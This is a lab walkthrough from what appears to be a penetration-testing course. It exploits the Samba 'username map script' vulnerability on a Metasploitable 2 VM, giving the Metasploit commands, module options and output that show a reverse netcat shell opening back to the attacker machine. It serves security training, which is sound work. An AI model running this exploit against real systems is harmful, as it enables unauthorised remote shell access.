SAMBA (Samba “username map script” Command Execution)

SAMBA (Samba “username map script” Command Execution)

Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.

Requirements

Kali Linux
The Kali Linux VM (or any other type of installation)

Metaploitable 2

The Metasploitable 2 VM

Metasploitable Framework

Metasploit Framework toolset (installed on Kali Linux by default)

Metasploitable 2 IP

The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.

Laboratory Workflow

The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.

1. Launch the Metasploit Framework

msfconsole

2. Use the module

use exploit/multi/samba/usermap_script

3. Check the module options

options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   139              yes       The target port (TCP)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.8.147    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

4. Set the appropriate options

set RHOSTS 192.168.8.142

RHOSTS => 192.168.8.142

5. Run the exploit

run

[*] Started reverse TCP handler on 192.168.8.147:4444 
[*] Command shell session 1 opened (192.168.8.147:4444 -> 192.168.8.142:50116) at 2023-03-28 18:47:28 -0400

Video

Video that resumes everything on this laboratory.

Questions

Now that you have completed this exploitation try to answer to following:

  1. Now, what can I do with the exploitation achieved?

  2. Which type of privileges do I have on the exploited target?

  3. How was this accomplished?

  4. Try to learn more about this vulnerability.

PreviousMySQL / MariaDB Default Credentials (MySQL Protocol)NextTomcat (Apache Tomcat Manager Application Deployer Authenticated Code Execution)

Last updated